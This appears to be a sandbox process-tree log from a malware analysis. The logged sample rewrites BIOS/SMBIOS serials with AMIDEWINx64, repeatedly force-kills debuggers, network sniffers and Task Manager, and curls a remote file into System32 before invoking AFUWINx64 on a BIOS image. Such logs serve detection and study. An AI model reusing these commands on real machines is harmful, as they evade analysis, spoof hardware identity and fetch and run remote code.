  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
  2⤵
  PID:2868
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
    3⤵
    - Executes dropped EXE
    PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1864
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
  2⤵
  PID:1664
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
    3⤵
    - Executes dropped EXE
    PID:1748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BV " "
  2⤵
  PID:3492
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BV " "
    3⤵
    - Executes dropped EXE
    PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2708
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BS 0738F3DWKLZFIS
  2⤵
  PID:3008
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BS 0738F3DWKLZFIS
    3⤵
    - Executes dropped EXE
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2964
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
  2⤵
  PID:4492
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:1416
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:3076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4156
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
  2⤵
  PID:1208
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
    3⤵
    - Executes dropped EXE
    PID:3236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
  2⤵
  PID:4004
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
    3⤵
    - Executes dropped EXE
    PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
  2⤵
  PID:2348
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:628
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CS 3RBGYYTL81
  2⤵
  PID:3808
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CS 3RBGYYTL81
    3⤵
    - Executes dropped EXE
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
  2⤵
  PID:4960
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1352
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
  2⤵
  PID:3716
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
    3⤵
    - Executes dropped EXE
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
  2⤵
  PID:4700
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5092
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
  2⤵
  PID:3284
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2552
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
  2⤵
  PID:2720
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:4996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Kills process with taskkill
    PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:5000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:1988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4852
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:2384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:4932
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:3168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:4380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:3320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:1536
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:2580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4956
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:3492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:4796
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2516
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2852
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:3120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:2912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:4136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4284
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:4048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:2108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3696
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1776
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:388
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2732
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3296
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:5056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1824
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:1612
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Kills process with taskkill
    PID:1860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:4624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:1044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:4516
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:2560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:3492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:3156
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Kills process with taskkill
    PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:4296
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:4156
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:4600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3540
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1876
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3496
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:2712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4208
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:3588
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:1060
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1952
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2008
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:1048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1848
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4844
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:2384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
  2⤵
  PID:2400
- - C:\Windows\system32\curl.exe
    curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom
    3⤵
    - Drops file in System32 directory
    PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4128
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:1132
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:3200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2676
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1884
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2560
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:1056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1632
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
  2⤵
  PID:1620
- - C:\Windows\System32\AFUWINx64.EXE
    C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o
    3⤵
